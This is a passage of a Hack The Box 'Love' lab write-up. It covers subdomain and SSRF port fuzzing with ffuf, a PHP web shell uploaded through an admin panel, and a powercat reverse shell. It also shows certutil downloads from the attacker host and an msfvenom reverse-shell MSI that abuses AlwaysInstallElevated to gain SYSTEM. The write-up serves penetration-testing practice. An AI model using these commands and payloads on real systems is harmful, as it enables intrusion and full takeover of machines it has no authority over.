:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.love.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 4388
________________________________________________
staging [Status: 200, Size: 5357, Words: 1543, Lines: 192, Duration: 44ms]
:: Progress: [4989/4989] :: Job [1/1] :: 190 req/sec :: Duration: [0:00:08] :: Errors: 0 ::sh
nano /etc/hosts
staging.love.htbstaging.love.htb
sh
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.239 - - [16/Jan/2025 22:02:27] "GET / HTTP/1.1" 200 -
numbers.py
sh
with open('numbers.txt', 'w') as file:
for i in range(1, 10001):
file.write(f"{i}\n")sh
python3 numbers.pysh
ffuf -u http://staging.love.htb/beta.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "file=http://127.0.0.1:FUZZ&read=Scan+file" -w numbers.txt:FUZZ -fs 4997
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://staging.love.htb/beta.php
:: Wordlist : FUZZ: /home/sake/htb-labs/Love/numbers.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : file=http://127.0.0.1:FUZZ&read=Scan+file
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4997
________________________________________________
80 [Status: 200, Size: 9385, Words: 1901, Lines: 337, Duration: 26ms]
443 [Status: 200, Size: 5466, Words: 1296, Lines: 224, Duration: 26ms]
- since cannot access the port
5000we can try local access
@LoveIsInTheAir!!!!
- manage to access to
http://love.htb/admin
# Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
- https://www.exploit-db.com/exploits/49445
- edit the profile picture directly with a php shell
echo '<?php system($_GET[0]); ?>' > shell.php
powercat rev shell
powershell
nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.239] 59570
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebeuser.txt
cmd
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
3fc8c520...priv esc
cmd
certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exesh
���������� PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 51BAlwaysinstallElevated
cmd
���������� Checking AlwaysInstallElevated
� https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f msi -o reverse.msicmd
certutil.exe -f -urlcache -split http://10.10.14.6/reverse.msi reverse.msicmd
msiexec /quiet /qn /i C:\Users\Phoebe\reverse.msish
nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.239] 59575
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\systemroot.txt
cmd
C:\Users\Administrator\Desktop>type root.txt
type root.txt
99e22c3f...Up next
EasyJan 2025
HTB — Mailing
hMailServer path traversal leaks admin hash. Outlook CVE-2024-21413 moniker link attack for NTLM relay, WinPEAS finds privesc vector.
Read writeup
EasyJan 2025
HTB — Analytics
Metabase pre-auth RCE CVE-2023-38646 via setup token SSRF for shell. Ubuntu OverlayFS CVE-2023-2640 local privilege escalation for root.
Read writeup
HardJan 2025
HTB — Backfire
HardHat C2 framework exposed via reverse proxy misconfiguration. JWT forgery for admin access, Sliver C2 implant exploitation for lateral movement.
Read writeup